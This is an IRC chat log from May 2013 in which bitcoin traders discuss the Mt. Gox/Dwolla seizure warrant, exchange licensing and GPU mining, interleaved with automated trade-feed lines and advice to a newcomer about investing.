[TAT.ASICMINER] 27 @ 0.01681 = 0.4539 BTC [-] May 15 19:55:39 [BTCTC] [ASICMINER-PT] 3 @ 1.7788 = 5.3364 BTC [-] May 15 19:55:45 [BTCTC] [ASICMINER-PT] 4 @ 1.779 = 7.116 BTC [+] May 15 19:55:49 Mircea Popescu received a classical education? May 15 19:56:06 seems like he got a decent one May 15 19:56:23 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 15 19:56:28 too bad he is so pissed off all the time :) May 15 19:56:44 im a licensed philosopher no less May 15 19:56:47 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 15 19:56:50 arent we all May 15 19:56:54 lol "licensed" May 15 19:56:56 Just on the edges, he's a pretty cool dude imo May 15 19:57:02 no lol, inasmuch as we don't have the diploma >D May 15 19:57:03 [HAVELOCK] [ASICM] 193 @ 0.0174 = 3.3582 BTC [+] May 15 19:57:04 [HAVELOCK] [ASICM] 7 @ 0.01744 = 0.1221 BTC [+] May 15 19:57:18 [BTCTC] [ASICMINER-PT] 1 @ 1.785 BTC [+] May 15 19:57:22 seems to me you failed school? May 15 19:57:30 if i beat a licensed philopher in a debate, do i get his license? May 15 19:57:46 you beat or beat up? May 15 19:57:52 lol May 15 19:57:54 hehe May 15 19:57:57 cuz if you beat him up, and you take it then sure May 15 19:58:01 you don't get his liocense, but you probably get his girl. May 15 19:58:15 lol how the fuck would he evar have a girl? May 15 19:58:23 The Philosopher's Girlfriend May 15 19:58:30 fiction May 15 19:58:40 almost an oxymoron :) May 15 19:59:36 http://cdn.arstechnica.net/wp-content/uploads/2013/05/Mt-Gox-Dwolla-Warrant-5-14-13.pdf May 15 19:59:37 silver keeps going down May 15 19:59:40 chicks dig philosophers. May 15 19:59:41 hope it hits 19 May 15 19:59:51 [MPEX] [S.MPOE] 4409 @ 0.00067168 = 2.9614 BTC [+] May 15 19:59:53 [MPEX] [S.MPOE] 9091 @ 0.00066943 = 6.0858 BTC [-] May 15 19:59:59 chicks digs guys with giant egos giant cocks, giant cars and giant wallets May 15 20:00:04 I want the Bugpowder's wifey summary May 15 20:00:14 I just saw the warrant May 15 20:00:30 and forwarded to my bitcoin investing mailing list. May 15 20:00:38 Bugpowda http://arstechnica.com/tech-policy/2013/05/feds-reveal-the-search-warrant-that-seized-mt-gox-account/ May 15 20:00:40 It's pretty straightforward May 15 20:00:40 kinda old news May 15 20:00:40 coinbase seems legit May 15 20:00:46 i've find the license on fincen website May 15 20:00:50 registered in delaware May 15 20:00:58 22 april 2013 May 15 20:01:03 mtgox is sloppy May 15 20:01:14 so the Wells Fargo account wasnt event the main account May 15 20:01:18 that is shady May 15 20:02:04 i don;'t think anyone seriously expected anything be better organised than their trade engine. May 15 20:02:13 [BTCTC] [ASICMINER-PT] 5 @ 1.78001 = 8.9001 BTC [-] May 15 20:02:52 wonder how many people are checking up on "mich mc farland" May 15 20:02:57 Wires from gox are still going thru though May 15 20:03:08 dwolla to gox is still working May 15 20:03:11 its the media trolling May 15 20:03:21 cuz dhs told them too May 15 20:03:28 CoinLab is presenting at a DC startup mixer tonight May 15 20:03:33 I'm going to go troll IRL May 15 20:03:43 record it! May 15 20:03:51 yes tell them they suck from me May 15 20:03:51 ask them, about bitconica funds May 15 20:03:53 at least they have a regular license, i'm curious to know if mtgox is legit in japan May 15 20:04:09 gox seems to be legit in japan May 15 20:04:10 i want my 715k shares and i want to be paid in btc not fiat PPS May 15 20:04:14 retarded coinlab pool May 15 20:04:46 http://tech.co/dcs-hottest-startup-2013-05 May 15 20:04:55 sad day for mtgox investors anyway May 15 20:05:03 it just got a third infusion too. May 15 20:05:08 ". Mt. Gox, the largest Bitcoin exchange in the world, and CoinLab are joining together to provide US and Canadian customers with a new exchange platform specifically catered to this market’s unique needs" May 15 20:05:08 [BTCTC] [TAT.ASICMINER] 6 @ 0.0173 = 0.1038 BTC [+] May 15 20:05:17 people invest in mt gox? oh fuck lol May 15 20:05:22 doh. May 15 20:05:34 I wonder if they are even going to show up? May 15 20:05:54 gox seems to be legit in japan << based on what ? May 15 20:06:19 japan not fucking with them meaning they paid off the right people (new people coming in can change this on a dime) May 15 20:06:37 trust me business in asia is not the same as in the west May 15 20:07:31 so, gox in 2011 check a no one a money transfur whatever cuz at the time btc was not money, then in 2013 btc became money cvuz fincen, so now they will go after gox? May 15 20:07:33 is that right? May 15 20:07:53 i hate gox, but what the govt is trying to do is so fucking lulz May 15 20:08:15 lolk May 15 20:09:30 wonder if they will go to japan to get him to serve 5 years in jail May 15 20:09:41 Haha, no. May 15 20:09:55 you mean that one guy in maryland cant do that? May 15 20:09:59 lol May 15 20:10:26 the govt is almost at troll level here May 15 20:10:26 that's all a few years away. May 15 20:10:40 first they take all his money and make him go through the court system for half a decade. May 15 20:10:48 re-read 1984, it's all there. May 15 20:10:52 he is guilty of trading money with out a permit in the usa (while being in japan) May 15 20:11:02 [HAVELOCK] [ASICM] 143 @ 0.01744 = 2.4939 BTC [+] May 15 20:11:09 1984 is an awesome book orwell was a brilliant motherfuckler May 15 20:11:19 [BTCTC] [TAT.ASICMINER] 71 @ 0.0173 = 1.2283 BTC [+] May 15 20:11:27 well they did not get much if any of his money May 15 20:11:40 he just wont us dwolla May 15 20:11:47 yaya. give this time./ May 15 20:11:56 but dwolla seems to still be sending fiat so they are not effected May 15 20:12:17 dwolla just got a pretty big VC infusion May 15 20:12:22 i have three copies of 1984 in my house, and i dont have many books May 15 20:12:23 [BTCTC] [ASICMINER-PT] 1 @ 1.784 BTC [+] May 15 20:12:25 The "Special" agent from DHS is upset because Mark Karpelles signed something which was correct when he signed it i 2010, but isn't as of Q2 2013. WTF? Inthe Soviet States of America you cah change the rules, and then punish people who broke the new rules in the past. May 15 20:12:53 The "Special" agent from DHS is upset because Mark Karpelles signed something which was correct when he signed it i 2010, but isn't as of Q2 2013. May 15 20:12:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.017379 = 0.2607 BTC [+] May 15 20:12:58 this 100 times May 15 20:13:05 I bet he went at a "spacial" school as well. May 15 20:13:08 he was correct, they changed the rules them fuick May 15 20:14:02 can i get a reference to this special agent business of which you speak? May 15 20:14:03 [HAVELOCK] [ASICM] 175 @ 0.01755 = 3.0713 BTC [+] May 15 20:14:11 no May 15 20:14:17 pweeeease May 15 20:14:31 http://cdn.arstechnica.net/wp-content/uploads/2013/05/Mt-Gox-Dwolla-Warrant-5-14-13.pdf May 15 20:14:46 sturles you realise he also signed a rider saying he'll keep the info up to date. May 15 20:14:54 [BTCTC] [ASICMINER-PT] 2 @ 1.785 = 3.57 BTC [+] May 15 20:15:11 yeah, why didn't they just try to comply May 15 20:15:17 its strage May 15 20:15:21 it's actually amazing that a DHS agent could purchase bitcoins... May 15 20:15:22 doesn't cost that much May 15 20:15:28 a few k May 15 20:15:49 mp "up to date" can mean anything May 15 20:15:50 then they don't get seized during the application process at least May 15 20:16:12 guys, they killed this in 2 hours May 15 20:16:16 its a non event May 15 20:16:28 dwolla killed it for gox May 15 20:16:40 just wait May 15 20:16:48 media will report this was all bs May 15 20:16:50 Bugpowda because he doesn't even know what that means. May 15 20:17:02 [HAVELOCK] [ASICM] 113 @ 0.01766 = 1.9956 BTC [+] May 15 20:17:04 [BTCTC] [TAT.ASICMINER] 36 @ 0.017414 = 0.6269 BTC [+] May 15 20:17:13 because the good lawyer is expensive and wanted even more to get involved wuith the weirods, and the "just as good" cheap lawyer... isn't just as good. May 15 20:17:32 mircea_popescu: I didn't read that. Where? May 15 20:17:48 "that". May 15 20:17:56 The rider? May 15 20:17:58 They could have afforded a good lawyer just from my fucking fees alone. May 15 20:17:59 thing is, when dealing with the us govt that can change the rules when ever you are always guilty May 15 20:18:04 esp if they want you to be May 15 20:18:09 dont do business in the usa.... May 15 20:18:28 but yes.. gox is fucking fail for not getting a decent lawyer May 15 20:18:43 sturles apparently nobody reads anymore. anyway, you have ever opened a bank account ? May 15 20:18:50 Bugpowda not a matter of affording. May 15 20:18:52 Chaaang-Noi: lotta money here, do business here but play the game the right way May 15 20:18:56 but alswo this whole "case" is from one dumbass low level ice procicuter trying to get headliunes to make a name for himself May 15 20:19:06 hire people that know how to deal with gov May 15 20:19:13 Chaaang-Noi nope, wrong again. May 15 20:19:20 it's not a dumbass prosecutor in any sense. May 15 20:19:24 oh mp, you poor poor sole May 15 20:19:27 mircea_popescu: I have opened many bank accounts. May 15 20:19:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.017414 = 0.0348 BTC [+] May 15 20:19:54 mircea_popescu: And I read every document. But I haven't opened an account in the USA. May 15 20:19:59 sturles so you are not aware you actually promised to keep your information up to date ?! May 15 20:20:01 where is this ? May 15 20:20:03 [HAVELOCK] [ASICM] 48 @ 0.01766 = 0.8477 BTC [+] May 15 20:20:05 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 15 20:20:16 Norway and Germany. May 15 20:20:34 well... learn something every day. May 15 20:20:43 apparently germany is different then. May 15 20:20:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:20:58 "up to date" is not a legal term May 15 20:21:04 [HAVELOCK] [VTX] 1 @ 0.455 BTC [-] May 15 20:21:05 [HAVELOCK] [VTX] 4 @ 0.451 = 1.804 BTC [-] May 15 20:21:09 i thin you are ful of shit mp May 15 20:21:32 this has suddenly gone gold. May 15 20:21:53 gone gold? May 15 20:22:10 you mean 500,000 people think you are full of shit? May 15 20:22:14 he shat gold bricks cuz i called him on trollin May 15 20:22:29 ThickAsThieves lol. May 15 20:22:32 hehe May 15 20:22:32 on that note,. off to bed, peace May 15 20:22:56 multiple screenshots required. May 15 20:23:00 [BTCTC] [TAT.ASICMINER] 23 @ 0.017414 = 0.4005 BTC [+] May 15 20:23:27 ThickAsThieves: is that you i see placing more shares up :p May 15 20:23:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.017414 = 0.0348 BTC [+] May 15 20:24:32 yes May 15 20:24:52 Hello. May 15 20:25:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.017 BTC [-] May 15 20:26:01 [BTCTC] [TAT.ASICMINER] 40 @ 0.017 = 0.68 BTC [-] May 15 20:26:02 [HAVELOCK] [ASICM] 39 @ 0.01766 = 0.6887 BTC [+] May 15 20:27:02 [HAVELOCK] [ASICM] 161 @ 0.0177 = 2.8497 BTC [+] May 15 20:27:45 [BTCTC] [TAT.ASICMINER] 64 @ 0.017 = 1.088 BTC [-] May 15 20:27:59 hi. May 15 20:28:57 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 15 20:29:21 just passed crypto-trade in all time sales on BTCTC May 15 20:29:45 Trying to think of ways to buy BTC without going to my bank and making a wire transfer. May 15 20:29:59 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [+] May 15 20:30:29 crypto-trade actually got 977 people to pay .2 for unicorns May 15 20:30:45 [BTCTC] [ASICMINER-PT] 1 @ 1.785 BTC [+] May 15 20:31:01 correct myself, not all time sales, all time volume May 15 20:31:12 not that any of you should care May 15 20:35:02 [BTCTC] [ASICMINER-PT] 1 @ 1.7889 BTC [+] May 15 20:36:17 [BTCTC] [ASICMINER-PT] 4 @ 1.7889 = 7.1556 BTC [+] May 15 20:37:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.017413 BTC [+] May 15 20:37:56 [BTCTC] [TAT.ASICMINER] 53 @ 0.017413 = 0.9229 BTC [+] May 15 20:38:21 [BTCTC] [ASICMINER-PT] 3 @ 1.789 = 5.367 BTC [+] May 15 20:39:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.017414 = 0.1741 BTC [+] May 15 20:40:31 makomk malaimo maximian metabyte_ midnightmagic MiningBuddy- mircea_popescu mjr_ mjr___ mod6 mpexbot May 15 20:40:31 makomk malaimo maximian metabyte_ midnightmagic MiningBuddy- mircea_popescu mjr_ mjr___ mod6 mpexbot May 15 20:40:33 WILLdude talk to mjr_ May 15 20:41:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:41:52 he'll say otc May 15 20:42:34 [BTCTC] [ASICMINER-PT] 1 @ 1.78 BTC [-] May 15 20:43:03 WILLdude, you could also trying selling things for BTC May 15 20:43:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:43:15 like amazon gift cards or whatever May 15 20:43:25 or services May 15 20:43:35 wtf mt gox website is going haywire May 15 20:43:51 the site is going haywire? May 15 20:44:30 when i go to it, the site refreshes very quickly and does nothing May 15 20:45:03 [HAVELOCK] [ASICM] 96 @ 0.01769999 = 1.6992 BTC [-] May 15 20:45:14 hm May 15 20:45:16 just logged me in May 15 20:45:31 Goodbye gox, goodbye US, goodbye world May 15 20:45:46 hello romania May 15 20:46:18 goodbye gox? May 15 20:46:23 heh May 15 20:46:44 aww why so bitter. May 15 20:47:03 [HAVELOCK] [ASICM] 74 @ 0.01755 = 1.2987 BTC [-] May 15 20:47:05 [HAVELOCK] [ASICM] 31 @ 0.0175 = 0.5425 BTC [-] May 15 20:47:06 [BTCTC] [ASICMINER-PT] 1 @ 1.788 BTC [+] May 15 20:47:07 and now gox has something to def. counter sue coinlab for May 15 20:47:17 It's not bitter. It just seems like a good idea. May 15 20:47:18 since the coinlab deal was to curtail this May 15 20:47:19 you can't sue over regulatory enforcement. May 15 20:47:43 doesnt the gox contract state maximum damage anyway May 15 20:47:48 no, but it has cost them losses May 15 20:47:52 by coinlab not being able to perform May 15 20:48:03 in damages May 15 20:49:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:49:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.017414 = 0.0522 BTC [+] May 15 20:49:45 why would Gox have multiple US checking accounts and pass betwen them? May 15 20:50:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:51:06 dwolla required it May 15 20:51:12 they will only deal wiht us banks May 15 20:51:52 but the warrant names one checking and then the news notes the Wells Fargo one too May 15 20:52:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:52:28 i guess its silly to try and figure this out with this little info May 15 20:53:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.017414 BTC [+] May 15 20:56:20 [BTCTC] [ASICMINER-PT] 1 @ 1.7875 BTC [-] May 15 20:58:05 [BTCTC] [BASIC-MINING] 1 @ 0.4399 BTC [+] May 15 21:03:39 hmm all the altcoins died May 15 21:03:51 GPU miners are best mining BTC now May 15 21:03:53 odd May 15 21:04:12 No BTC, no altcoins May 15 21:04:56 nihilism! May 15 21:06:22 cgminer version 2.4.0 - Started: [November 29, 2012, 12:47 pm] May 15 21:06:32 (avg): 1039.92 Mh/s | Q:4217888 A:3417145 R:63802 May 15 21:06:52 [Elapsed] => 14426198 May 15 21:06:52 [MHS av] => 1039.92 May 15 21:06:53 [Found Blocks] => 19 May 15 21:06:56 gpu minin' May 15 21:07:49 19 blocks with a jiggahash May 15 21:08:38 mtgox down for others also? May 15 21:09:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.017413 = 0.0522 BTC [-] May 15 21:12:01 kakobrekla imagien the dividends May 15 21:12:02 PhantomSpark pigeons pingec pizzaman1337 Populus PsychoticBoy Pucilowski May 15 21:12:17 :) May 15 21:18:03 the pools have been dossed May 15 21:18:10 i failover to solo you know May 15 21:18:32 19 blocks since november is epic May 15 21:19:05 i still have a working bithopper running in screen from 2011 May 15 21:19:22 huh May 15 21:19:27 this will all die out soon May 15 21:19:35 i keep the hashes going is all May 15 21:23:04 [HAVELOCK] [SDICE] 1 @ 0.2691 BTC [-] May 15 21:23:05 [HAVELOCK] [SDICE] 1 @ 0.26900001 BTC [-] May 15 21:25:53 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:26:04 [HAVELOCK] [HIM] 1 @ 2.149 BTC [+] May 15 21:27:47 [MPEX] [S.MPOE] 2609 @ 0.00066943 = 1.7465 BTC [-] May 15 21:27:49 [MPEX] [S.MPOE] 7000 @ 0.00066917 = 4.6842 BTC [-] May 15 21:28:03 [MPEX] [S.MPOE] 9238 @ 0.00066691 = 6.1609 BTC [-] May 15 21:28:04 [MPEX] [S.MPOE] 15867 @ 0.00066687 = 10.5812 BTC [-] May 15 21:28:05 [MPEX] [S.MPOE] 6286 @ 0.00066582 = 4.1853 BTC [-] May 15 21:28:08 [BTCTC] [TAT.ASICMINER] 8 @ 0.0174 = 0.1392 BTC [-] May 15 21:29:09 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:29:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.0174 = 0.1044 BTC [-] May 15 21:31:06 jcpham, that's pretty damn cool. May 15 21:31:16 bithopper from 2011, amazing. May 15 21:31:31 what is your hashrate? May 15 21:31:47 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:32:06 [BTCTC] [ASICMINER-PT] 1 @ 1.787 BTC [+] May 15 21:35:31 whats the streaming trades channel again? May 15 21:35:45 bitcoin-assets-trades May 15 21:35:49 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:36:08 tx May 15 21:36:35 btce dump May 15 21:40:15 hey Bugpowda May 15 21:40:37 sup May 15 21:40:40 gox down? May 15 21:41:18 [MPEX] [S.MPOE] 16400 @ 0.00067103 = 11.0049 BTC [+] May 15 21:41:18 ;;goxlag May 15 21:41:18 I sent a message to CampBX May 15 21:41:19 [MPEX] [S.MPOE] 5943 @ 0.00067104 = 3.988 BTC [+] May 15 21:41:27 [MPEX] [S.MPOE] 3007 @ 0.00067172 = 2.0199 BTC [+] May 15 21:41:29 Error: Problem retrieving gox lag. Try again later. May 15 21:41:41 asking if they are a licensed MSB anf id they willbe affected by money laundering scrutiny May 15 21:41:45 they say May 15 21:42:04 "We are fully compliant with all state and federal regulations and do not foresee any issues in continuing operation." May 15 21:43:21 [BTCTC] [BASIC-MINING] 1 @ 0.464999 BTC [+] May 15 21:43:31 [BTCTC] [BASIC-MINING] 1 @ 0.465 BTC [+] May 15 21:43:37 [BTCTC] [BASIC-MINING] 1 @ 0.47988 BTC [+] May 15 21:43:44 [BTCTC] [BASIC-MINING] 2 @ 0.4799 = 0.9598 BTC [+] May 15 21:43:53 [BTCTC] [BASIC-MINING] 5 @ 0.48 = 2.4 BTC [+] May 15 21:44:00 !goxlag May 15 21:44:06 er May 15 21:44:09 ;;goxlag May 15 21:44:09 Error: Problem retrieving gox lag. Try again later. May 15 21:44:40 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:46:01 [BTCTC] [ASICMINER-PT] 1 @ 1.7865 BTC [-] May 15 21:46:50 oh oh May 15 21:46:52 [BTCTC] [ASICMINER-PT] 8 @ 1.787 = 14.296 BTC [+] May 15 21:46:55 i thin kive seen this before ThickAsThieves May 15 21:47:01 someone asked if they were compliant May 15 21:47:12 and they said they have fully complied with each state that requires it May 15 21:47:22 and then later they said that to their knowledge, NO state requires a license May 15 21:47:34 but i might be wrong, maybe that was some other exchange or something May 15 21:47:40 but someone was grilling them pretty hard May 15 21:48:03 they said state AND federal May 15 21:48:05 [BTCTC] [ASICMINER-PT] 2 @ 1.787 = 3.574 BTC [+] May 15 21:48:30 This shit needs to sell off May 15 21:48:42 so I can buy a shitload of coins and take them off gox May 15 21:48:59 [BTCTC] [ASICMINER-PT] 3 @ 1.786 = 5.358 BTC [-] May 15 21:49:09 careful, some people are reporting difficulty getting coins out May 15 21:49:15 i dunno either way tho May 15 21:49:26 my friend just withdrew 100 May 15 21:49:38 cool May 15 21:50:20 you really think a selloff will happen if people are worried about getting USD out? May 15 21:50:43 it did earlier May 15 21:51:01 ThickAsThieves: that is the catch-22 May 15 21:51:04 [MPEX] [S.MPOE] 4071 @ 0.00067172 = 2.7346 BTC [+] May 15 21:51:06 [MPEX] [S.MPOE] 12080 @ 0.00067185 = 8.1159 BTC [+] May 15 21:51:30 meh, i gave up gambling on BTCUSD behavior May 15 21:51:35 went all-in May 15 21:51:35 might be time to get trusted status May 15 21:51:48 hrm May 15 21:51:50 i dunno where i saw that May 15 21:51:55 ThickAsThieves: did you see what i was talkinga bout? May 15 21:52:00 i think it was on btctalk May 15 21:52:43 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 21:52:50 made a few hundred BTC trading the dip last night... I'm not consistently winning though. And the fees are getting preposterous. May 15 21:53:09 how low? May 15 21:53:20 inhies, i didnt May 15 21:53:28 but not worried too much May 15 21:53:39 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 21:53:58 I finally put together a spreadsheet and discovered that after 30 days of trading, I was down 10btc, so I quit, back into cold storage! May 15 21:54:04 [HAVELOCK] [ASICM] 64 @ 0.0177 = 1.1328 BTC [+] May 15 21:54:06 goat troll fail: https://bitcointalk.org/index.php?topic=102333.msg2158143#msg2158143 May 15 21:54:07 i'll just make a million $ worth in BTC, then move and cash out in native currency May 15 21:54:14 :) May 15 21:54:36 it's ok, it was a fraction of previous profits, I have to capital in btc anymore, just 'winnings' :) May 15 21:54:52 ThickAsThieves: that is the BEST PLAN. May 15 21:54:56 I"ve thought about that May 15 21:55:28 ThickAsThieves: you'll have to cash out somewhere outside of revenuers' sight May 15 21:55:42 [BTCTC] [COGNITIVE] 2 @ 0.239 = 0.478 BTC [+] May 15 21:55:48 maybe by then i can deal in BTC easily May 15 21:55:49 and million $ is barely enough to retire May 15 21:55:52 and not cash out at all May 15 21:56:09 i doubt i'll ever retire May 15 21:56:16 too much tinkering to do May 15 21:56:24 [BTCTC] [COGNITIVE] 2 @ 0.2395 = 0.479 BTC [+] May 15 21:57:16 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 21:57:34 btw, someone who's spending time around btctc, what is the opinion on MPOE there? May 15 21:57:50 no one trades it May 15 21:57:50 would be passable trying to list MPBPT? May 15 21:57:51 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 21:57:55 nah May 15 21:58:07 honestly, if you arent dealing AM right now May 15 21:58:10 or IPOing May 15 21:58:13 no one cares May 15 21:58:30 that about sums up the exchanegs right now May 15 21:58:55 [BTCTC] [BTC-BOND] 4 @ 0.010098 = 0.0404 BTC [+] May 15 21:59:03 [HAVELOCK] [ASICM] 12 @ 0.01777 = 0.2132 BTC [+] May 15 21:59:13 there is a little bit of action from people buying shares of Avalons that done exist too May 15 21:59:18 ThickAsThieves: there isn't a problem getting out of gox right now BTW. Wires still work fine, and I think any player with >$5,000 to withdraw would use a wire. May 15 21:59:18 dont* May 15 21:59:27 cool May 15 21:59:29 i know, but maybe in 2 months, *if* asicminer can crash and mpoe bonds will be profitable May 15 21:59:30 Thus a selloff could still occur. May 15 21:59:35 i dont plan on cashing out anytime soon May 15 22:00:01 jurov, May 15 22:00:10 do what i was agonna do before i do it May 15 22:00:16 an Options fund May 15 22:00:31 play both sides if you like May 15 22:00:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0174 BTC [-] May 15 22:00:40 come up with a strategy May 15 22:00:50 sell options, buy them, whatever May 15 22:00:54 ThickAsThieves did that contain a reg# or anything ? May 15 22:01:13 the campbx reply? no May 15 22:01:28 if you structure the question for me i'll ask it tho May 15 22:02:08 "This is all nice and good, usagi also imagines he is fully compliant with what he understands of all applicable regulations. What is your MSB registration # ?" May 15 22:02:28 lol May 15 22:02:29 possibly without the first sentence. May 15 22:02:33 yeah May 15 22:02:33 hehe May 15 22:02:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0174 = 0.174 BTC [-] May 15 22:02:42 Have you seen his new vanity address? May 15 22:02:47 1Tranny May 15 22:03:32 [BTCTC] [S.MPOE-PT] 8 @ 0.00065 = 0.0052 BTC [-] May 15 22:03:45 [BTCTC] [PAJKA.BOND] 5 @ 0.106 = 0.53 BTC [+] May 15 22:03:50 mp, I asked them May 15 22:03:56 i'll let chan know if they respond May 15 22:04:04 [HAVELOCK] [ASICM] 23 @ 0.01777 = 0.4087 BTC [+] May 15 22:04:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0174 BTC [-] May 15 22:05:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0174 BTC [-] May 15 22:05:05 [HAVELOCK] [ASICM] 151 @ 0.0177 = 2.6727 BTC [-] May 15 22:05:21 i guess even bitbet-backed security could be run more reliably than something over mpoe options May 15 22:05:32 (profit-wise) May 15 22:06:04 [HAVELOCK] [ASICM] 67 @ 0.01777 = 1.1906 BTC [+] May 15 22:06:14 [BTCTC] [TAT.ASICMINER] 17 @ 0.0174 = 0.2958 BTC [-] May 15 22:06:34 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 22:07:11 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 22:07:18 I won't be doing the Options fund anytime soon, if at all May 15 22:07:36 [BTCTC] [ASICMINER-PT] 1 @ 1.7855 BTC [-] May 15 22:07:43 this AM stuff is nearly full time May 15 22:07:49 and i have other plans elsewise May 15 22:09:08 hello. May 15 22:09:16 [BTCTC] [ASICMINER-PT] 1 @ 1.7857 BTC [+] May 15 22:09:26 I wonder if the share price will keep climbing. May 15 22:10:10 shouldn't you wonder how to flatten mpex depth data? May 15 22:10:28 [BTCTC] [ASICMINER-PT] 12 @ 1.786 = 21.432 BTC [+] May 15 22:12:00 willdude, we are all wondering May 15 22:12:04 Put in a bit at 0.0182 :) May 15 22:12:06 *bid May 15 22:12:15 Actually, I might retract that. May 15 22:12:18 ? May 15 22:12:21 its cheaper than that May 15 22:12:24 like everywhere May 15 22:12:38 *ask May 15 22:12:53 oh May 15 22:12:59 you just bought it May 15 22:13:07 WILLdude it will keep climbing until all the noobs are tapped out at which point it will stop climbing May 15 22:13:10 youre gonna day trade 5 shares? May 15 22:13:11 way this usually works. May 15 22:13:35 Day trade? May 15 22:13:35 keep in mind that you pay exchange fees when you buy/sell May 15 22:13:48 [BTCTC] [TAT.ASICMINER] 26 @ 0.017411 = 0.4527 BTC [+] May 15 22:13:50 yeah, like flip your shares for a profit May 15 22:13:59 short-term May 15 22:14:05 Flipping them? May 15 22:14:16 yeah like when you jump into a pool May 15 22:15:12 IDk May 15 22:15:22 how many do you have May 15 22:15:50 2 100ths May 15 22:16:09 what did you pay May 15 22:16:16 [BTCTC] [ASICMINER-PT] 1 @ 1.7857 BTC [-] May 15 22:16:21 [BTCTC] [ASICMINER-PT] 15 @ 1.786 = 26.79 BTC [+] May 15 22:16:23 ฿0.0330 May 15 22:16:29 [BTCTC] [ASICMINER-PT] 3 @ 1.789 = 5.367 BTC [+] May 15 22:16:38 For both. May 15 22:16:42 Obviously. May 15 22:16:49 [BTCTC] [ASICMINER-PT] 1 @ 1.7857 BTC [-] May 15 22:17:16 [BTCTC] [ASICMINER-PT] 5 @ 1.789 = 8.945 BTC [+] May 15 22:17:54 [BTCTC] [TAT.ASICMINER] 74 @ 0.017411 = 1.2884 BTC [+] May 15 22:18:01 Bitcoin: where $3 is an investment May 15 22:18:13 [BTCTC] [TAT.ASICMINER] 56 @ 0.017411 = 0.975 BTC [+] May 15 22:18:14 let it ride will May 15 22:18:19 just hold your shares May 15 22:18:34 dont stress out over so little May 15 22:18:37 it's not worth it May 15 22:18:39 O.o May 15 22:19:05 if you cant handle holding them May 15 22:19:07 sell them May 15 22:19:26 and get a coke or a redbull May 15 22:19:26 just dont be all panicky May 15 22:19:30 or act on whims May 15 22:19:34 have a plan May 15 22:19:37 and stick with it May 15 22:22:15 WTF? May 15 22:22:17 Oh. May 15 22:22:27 Probably my server rebooting. May 15 22:24:36 Just bought 0.1 mbtc for 11 quid. May 15 22:24:37 :( May 15 22:24:42 *btc May 15 22:25:09 Tried to do it from pounds to linden dollars to btc. May 15 22:25:11 willdude i think you arent quite ready for this channel May 15 22:25:17 Ended up with a load left over. May 15 22:25:19 Hahaha. May 15 22:25:22 you should hang out on the forums more May 15 22:25:23 Lol. May 15 22:25:27 make more coin May 15 22:25:32 read more about bitcoin May 15 22:25:35 and investing May 15 22:25:37 [BTCTC] [BASIC-MINING] 7 @ 0.47 = 3.29 BTC [-] May 15 22:25:39 etc May 15 22:25:42 Cause I'm a noob and I make stupid decisions? May 15 22:25:55 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] May 15 22:26:03 you're a noob, so stupid decisions are unavoidable May 15 22:26:11 I think the price is about to crack May 15 22:26:12 Thanks. May 15 22:26:16 nothing to do with your capacity for intellidence May 15 22:26:23 Lol May 15 22:26:29 just where you are on your path May 15 22:26:42 Anywhere good to read up on btc investement? May 15 22:26:48 Google May 15 22:26:58 .com May 15 22:27:09 Haha. May 15 22:27:15 not really a joke May 15 22:27:22 or May 15 22:27:24 trilema May 15 22:27:31 or bitcointalk forums May 15 22:27:32 Should have done lmgtfy. May 15 22:27:34 etc May 15 22:27:43 or lurk in here all day May 15 22:27:50 until everything starts to make sense May 15 22:27:55 dude really, don't insist on being an investor. May 15 22:28:12 at this stage you'll make more btc if you can figure out python data structures May 15 22:28:22 believe me, it's easier than investment May 15 22:29:05 [HAVELOCK] [ASICM] 198 @ 0.01777 = 3.5185 BTC [+] May 15 22:29:06 [HAVELOCK] [ASICM] 52 @ 0.01785 = 0.9282 BTC [+] May 15 22:30:39 crack up or down May 15 22:30:54 down May 15 22:31:18 ya i see its diving on btc e May 15 22:38:38 btctc AM div has just been paid so I see May 15 22:39:08 [BTCTC] [ASICMINER-PT] 2 @ 1.789 = 3.578 BTC [+] May 15 22:39:27 get ready for fireworks May 15 22:39:33 [BTCTC] [ASICMINER-PT] 1 @ 1.753001 BTC [-] May 15 22:39:40 site will crash hehe May 15 22:40:55 Why? May 15 